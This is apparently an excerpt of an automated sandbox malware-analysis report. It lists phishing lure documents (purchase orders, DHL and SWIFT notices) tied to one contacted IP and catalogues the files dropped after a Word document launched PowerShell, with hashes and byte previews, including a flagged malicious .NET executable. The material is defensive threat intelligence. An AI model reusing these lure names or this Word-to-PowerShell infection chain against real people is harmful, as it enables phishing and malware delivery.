                                                                                          XB201019BU XB201019BA.xlsxGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          Bnp Paribas SWIFT.xlsxGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          trinitymediaorder-po140521.docGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          Pk_673672.xlsxGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          latvia-order-051121_.docGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          M2.Tr.23.xlsxGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          GFG-group-CompanyProfile - Copy.docGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          DELL CORE.xlsxGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          Revised_PO_758869.docxGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          jt50apTCUS.docxGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          PO5421-allignright.docGet hashmaliciousBrowse
                                                                                          • 149.154.167.220
                                                                                          Pending DHL Shipment Notification REF 04521.xlsxGet hashmaliciousBrowse
                                                                                          • 149.154.167.220

                                                                                          Dropped Files

                                                                                          No context

                                                                                          Created / dropped Files

                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{96CDA2CA-B597-4160-9AA2-9325CEFB4D67}.tmp
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):1536
                                                                                          Entropy (8bit):1.4464746573881937
                                                                                          Encrypted:false
                                                                                          SSDEEP:6:BIqkl5rIYouvtP2V0lKlkYGsWljl8ljl6NgREqAWlgFJA/jlll8vlw2FrA:6C8vtPq0liklZ8lZek5uFJAbuvq2ZA
                                                                                          MD5:0A591D3E318050841EA0299DCB5B7CD2
                                                                                          SHA1:38B96268A9D5490236D7353EDF792B7F03503B37
                                                                                          SHA-256:42E97B6786E4ECFF2AA665A79E628F9F18CC27FA9815C0567D96634C8CEA66F5
                                                                                          SHA-512:3D89FBAB4E269D0BF28A050486A24E0CCFBB8B3AD1D1C636315610DD6C2E6F4B15C3A4C32B020B3CA876762DAD2E344D0AC5ACF3B81B51B48AEC1B694FBFFCB1
                                                                                          Malicious:false
                                                                                          Preview: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .3.7.7.3.2.5.2.7. . . . . . . . . . . . ._. . . . . . . . . . . . . . . . . . . . . . . . . . . . . ... . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.g.k.J.Z.J.I.f.l.H.v.L.F.U.Z.q._.g.G.K.q.b.4.H.2.7.Z.0.S.H.4.r.7.r.m.U.8.N.n.z.H.J.E.H.o.c.j.m.c.Y.8.F.S.c.S. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .7.5.0.2.0.2.3.5.3.7.5.0.2.0.2.3.5.3.=....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D.........................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B65E8223-1CF8-4E74-AA78-05F4F57053A0}.tmp
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):1024
                                                                                          Entropy (8bit):0.05390218305374581
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:ol3lYdn:4Wn
                                                                                          MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                          SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                          SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                          SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                          Malicious:false
                                                                                          Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          C:\Users\user\AppData\Local\Temp\qweruiuyt\qweruiuyt.exe
                                                                                          Process:C:\Users\user\AppData\Roaming\srt.exe
                                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):3777536
                                                                                          Entropy (8bit):2.5622413210602293
                                                                                          Encrypted:false
                                                                                          SSDEEP:768:MnLGH0oPWsQPNIF2wMxBH1R1Cr8h68EyWgloa1muQtN5Cc/5wMhb93IuWl5FeQ1g:YWQ6F2Jf6
                                                                                          MD5:9CDE4342C81458316E29CCBDA9B5A8E6
                                                                                          SHA1:2EF9AA9BE30282A264FCA77C52DBC0F77EB09A0F
                                                                                          SHA-256:F684F3065013459E4B2F23B77CA621D61690B13D016C7A9146D8111ED1CF0EB1
                                                                                          SHA-512:E92B6447388BA357D616C04D57C73CEC71166CA241B74DB99C348000F0CDD1B5F89937B81114A27CE800F5F22579F7C86D7C7B6F7E78FA9434615B1231FBC8A8
                                                                                          Malicious:true
                                                                                          Antivirus:
                                                                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....p............"...0...9.........~.9.. ....9...@.. ........................:...........`.................................$.9.W.....9.@.....................9...................................................... ............... ..H............text.....9.. ....9................. ..`.rsrc...@.....9.......9.............@..@.reloc........9.......9.............@..B................`.9.....H........$....9..........................................................*".(.....*..(........}......}.......( ...}.......}....*".(.....*....0..8..........rx..p..r.q9p.......%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%.r.q9p.%..r.q9p.(#........+3+... .......o..........(.....(....o.......X.....X......o....2........%.. .o.....s............+L..........o...........,.+,..r)..p(........,.+...(....(.........o.........X.......i2..o.........(.....*.0..............
                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Order Confirmation.LNK
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:15 2020, mtime=Wed Aug 26 14:08:15 2020, atime=Fri May 28 03:32:33 2021, length=4964, window=hide
                                                                                          Category:dropped
                                                                                          Size (bytes):2108
                                                                                          Entropy (8bit):4.566200776347662
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:8L96/XTd6jFy7xFem9Dv3qYdM7dD2L96/XTd6jFy7xFem9Dv3qYdM7dV:8p6/XT0jFmF9cYQh2p6/XT0jFmF9cYQ/
                                                                                          MD5:0013656654B96B5872CF3F39C90D604F
                                                                                          SHA1:45ABA0F92E0428267351470BECA899D4F4C52B1F
                                                                                          SHA-256:D6EBF0142B906D42A5DA9FA02B36F786A43F110AA24FE963A48C9D93D1670871
                                                                                          SHA-512:31407038595F39C1D8458CF4E39E8E2C013C96AC11D5178DD52D5A62A496DCB682E62CD5C67FEE666EC4A1211407AEEAFD4D1CF3646FCFA2F440C8D7A99DB332
                                                                                          Malicious:false
                                                                                          Preview: L..................F.... ...jK.{..jK.{...e.zzS..d............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2.d....R.$ .ORDERC~1.DOC..Z.......Q.y.Q.y*...8.....................O.r.d.e.r. .C.o.n.f.i.r.m.a.t.i.o.n...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\562258\Users.user\Desktop\Order Confirmation.doc.-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.O.r.d.e.r. .C.o.n.f.i.r.m.a.t.i.o.n...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......562258..........D_....3N...W..
                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):92
                                                                                          Entropy (8bit):4.4480595487175165
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:M1sBWpLaLFSyApLaLFSmX1sBWpLaLFSv:MSBWosoaBWoc
                                                                                          MD5:731049B1ABED5ABB2EDDDD8361CE0D15
                                                                                          SHA1:1CE761547476C148EF236DF29541B9BFDB4B2E24
                                                                                          SHA-256:8E141E73B2C3F6BB705FA9BFC4905AC7E6B4C1837ECA4E48A9B64CEBCEE59221
                                                                                          SHA-512:73886B1C5C0FDC6AB4FEAB28197CCB30DD6ED747BEFB7176BC897FB48775E4B45924364DEDDDAED509E8DA98DF57D6C63518AC2771301C925B4C6839F0A3D908
                                                                                          Malicious:false
                                                                                          Preview: [doc]..Order Confirmation.LNK=0..Order Confirmation.LNK=0..[doc]..Order Confirmation.LNK=0..
                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):162
                                                                                          Entropy (8bit):2.431160061181642
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
                                                                                          MD5:39EB3053A717C25AF84D576F6B2EBDD2
                                                                                          SHA1:F6157079187E865C1BAADCC2014EF58440D449CA
                                                                                          SHA-256:CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
                                                                                          SHA-512:5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
                                                                                          Malicious:false
                                                                                          Preview: .user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...
                                                                                          C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
                                                                                          Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                          File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):2
                                                                                          Entropy (8bit):1.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:Qn:Qn
                                                                                          MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                          SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                          SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                          SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                          Malicious:false
                                                                                          Preview: ..
                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0YFTOFA1UX06XNVZNT2R.temp
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):8016
                                                                                          Entropy (8bit):3.5884310636642236
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:chQCsMqDqvsqvJCwouz8hQCsMqDqvsEHyqvJCwor4zg1KrGHhZqOblUVUIu:cyWouz8yOHnor4zgUYZqOPIu
                                                                                          MD5:2075EE261E68559EC52375BEA0BEC437
                                                                                          SHA1:9663B3AF53E35001810BDD8F4DA27A9F606103CC
                                                                                          SHA-256:5EC0E080DDB3A073E9E487B003A840AEAB73C5C79023888E4352AA4206A29FF5
                                                                                          SHA-512:5B94A6EC734EBCCB48A79F3545861A3A170B05A8BF20DD6281380A52C0F5DD0742C537BBAD499A0B120A7B6ACCADC3031F661FB8D857EDA2834C53F11E4F2B03
                                                                                          Malicious:false
                                                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1942RCSB2O31S6U5MA4S.temp
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):8016
                                                                                          Entropy (8bit):3.5884310636642236
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:chQCsMqDqvsqvJCwouz8hQCsMqDqvsEHyqvJCwor4zg1KrGHhZqOblUVUIu:cyWouz8yOHnor4zgUYZqOPIu
                                                                                          MD5:2075EE261E68559EC52375BEA0BEC437
                                                                                          SHA1:9663B3AF53E35001810BDD8F4DA27A9F606103CC
                                                                                          SHA-256:5EC0E080DDB3A073E9E487B003A840AEAB73C5C79023888E4352AA4206A29FF5
                                                                                          SHA-512:5B94A6EC734EBCCB48A79F3545861A3A170B05A8BF20DD6281380A52C0F5DD0742C537BBAD499A0B120A7B6ACCADC3031F661FB8D857EDA2834C53F11E4F2B03
                                                                                          Malicious:false
                                                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6KADY7J9ART0C2SBCS62.temp
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):8016
                                                                                          Entropy (8bit):3.5884310636642236
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:chQCsMqDqvsqvJCwouz8hQCsMqDqvsEHyqvJCwor4zg1KrGHhZqOblUVUIu:cyWouz8yOHnor4zgUYZqOPIu
                                                                                          MD5:2075EE261E68559EC52375BEA0BEC437
                                                                                          SHA1:9663B3AF53E35001810BDD8F4DA27A9F606103CC
                                                                                          SHA-256:5EC0E080DDB3A073E9E487B003A840AEAB73C5C79023888E4352AA4206A29FF5
                                                                                          SHA-512:5B94A6EC734EBCCB48A79F3545861A3A170B05A8BF20DD6281380A52C0F5DD0742C537BBAD499A0B120A7B6ACCADC3031F661FB8D857EDA2834C53F11E4F2B03
                                                                                          Malicious:false
                                                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\8M2YB4LT04L8UHH8NWZS.temp
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):8016
                                                                                          Entropy (8bit):3.5884310636642236
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:chQCsMqDqvsqvJCwouz8hQCsMqDqvsEHyqvJCwor4zg1KrGHhZqOblUVUIu:cyWouz8yOHnor4zgUYZqOPIu
                                                                                          MD5:2075EE261E68559EC52375BEA0BEC437
                                                                                          SHA1:9663B3AF53E35001810BDD8F4DA27A9F606103CC
                                                                                          SHA-256:5EC0E080DDB3A073E9E487B003A840AEAB73C5C79023888E4352AA4206A29FF5
                                                                                          SHA-512:5B94A6EC734EBCCB48A79F3545861A3A170B05A8BF20DD6281380A52C0F5DD0742C537BBAD499A0B120A7B6ACCADC3031F661FB8D857EDA2834C53F11E4F2B03
                                                                                          Malicious:false
                                                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\DMBUF8U3200B990DZ7XU.temp
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):8016
                                                                                          Entropy (8bit):3.5884310636642236
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:chQCsMqDqvsqvJCwouz8hQCsMqDqvsEHyqvJCwor4zg1KrGHhZqOblUVUIu:cyWouz8yOHnor4zgUYZqOPIu
                                                                                          MD5:2075EE261E68559EC52375BEA0BEC437
                                                                                          SHA1:9663B3AF53E35001810BDD8F4DA27A9F606103CC
                                                                                          SHA-256:5EC0E080DDB3A073E9E487B003A840AEAB73C5C79023888E4352AA4206A29FF5
                                                                                          SHA-512:5B94A6EC734EBCCB48A79F3545861A3A170B05A8BF20DD6281380A52C0F5DD0742C537BBAD499A0B120A7B6ACCADC3031F661FB8D857EDA2834C53F11E4F2B03
                                                                                          Malicious:false
                                                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EO3H3IY5NM4WH0M9MRH7.temp
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):8016
                                                                                          Entropy (8bit):3.5884310636642236
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:chQCsMqDqvsqvJCwouz8hQCsMqDqvsEHyqvJCwor4zg1KrGHhZqOblUVUIu:cyWouz8yOHnor4zgUYZqOPIu
                                                                                          MD5:2075EE261E68559EC52375BEA0BEC437
                                                                                          SHA1:9663B3AF53E35001810BDD8F4DA27A9F606103CC
                                                                                          SHA-256:5EC0E080DDB3A073E9E487B003A840AEAB73C5C79023888E4352AA4206A29FF5
                                                                                          SHA-512:5B94A6EC734EBCCB48A79F3545861A3A170B05A8BF20DD6281380A52C0F5DD0742C537BBAD499A0B120A7B6ACCADC3031F661FB8D857EDA2834C53F11E4F2B03
                                                                                          Malicious:false
                                                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FCY55PSGG27QKIBWUNB2.temp
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):8016
                                                                                          Entropy (8bit):3.5884310636642236
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:chQCsMqDqvsqvJCwouz8hQCsMqDqvsEHyqvJCwor4zg1KrGHhZqOblUVUIu:cyWouz8yOHnor4zgUYZqOPIu
                                                                                          MD5:2075EE261E68559EC52375BEA0BEC437
                                                                                          SHA1:9663B3AF53E35001810BDD8F4DA27A9F606103CC
                                                                                          SHA-256:5EC0E080DDB3A073E9E487B003A840AEAB73C5C79023888E4352AA4206A29FF5
                                                                                          SHA-512:5B94A6EC734EBCCB48A79F3545861A3A170B05A8BF20DD6281380A52C0F5DD0742C537BBAD499A0B120A7B6ACCADC3031F661FB8D857EDA2834C53F11E4F2B03
                                                                                          Malicious:false
                                                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\I1SR5ACDFS80EZITQNPE.temp
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):8016
                                                                                          Entropy (8bit):3.5884310636642236
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:chQCsMqDqvsqvJCwouz8hQCsMqDqvsEHyqvJCwor4zg1KrGHhZqOblUVUIu:cyWouz8yOHnor4zgUYZqOPIu
                                                                                          MD5:2075EE261E68559EC52375BEA0BEC437
                                                                                          SHA1:9663B3AF53E35001810BDD8F4DA27A9F606103CC
                                                                                          SHA-256:5EC0E080DDB3A073E9E487B003A840AEAB73C5C79023888E4352AA4206A29FF5
                                                                                          SHA-512:5B94A6EC734EBCCB48A79F3545861A3A170B05A8BF20DD6281380A52C0F5DD0742C537BBAD499A0B120A7B6ACCADC3031F661FB8D857EDA2834C53F11E4F2B03
                                                                                          Malicious:false
                                                                                          Preview: ...................................FL..................F.".. .....8.D...xq.{D...xq.{D...k............................P.O. .:i.....+00.../C:\...................\.1.....{J.\. PROGRA~3..D.......:..{J.\*...k.....................P.r.o.g.r.a.m.D.a.t.a.....X.1.....~J|v. MICROS~1..@.......:..~J|v*...l.....................M.i.c.r.o.s.o.f.t.....R.1.....wJ;.. Windows.<.......:..wJ;.*.........................W.i.n.d.o.w.s.......1......:((..STARTM~1..j.......:...:((*...................@.....S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.....~.1......Pf...Programs..f.......:...Pf.*...................<.....P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.......1.....xJu=..ACCESS~1..l.......:..wJr.*...................B.....A.c.c.e.s.s.o.r.i.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.1.....j.1......:''..WINDOW~1..R.......:.,.:''*.........................W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....v.2.k....:., .WINDOW~2.LNK..Z.......:.,.:.,*....=....................W.i.n.d.o.w.s.
                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\L6GPO9OENPBATFZW24EO.temp
                                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):8016
                                                                                          Entropy (8bit):3.5884310636642236
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:chQCsMqDqvsqvJCwouz8hQCsMqDqvsEHyqvJCwor4zg1KrGHhZqOblUVUIu:cyWouz8yOHnor4zgUYZqOPIu
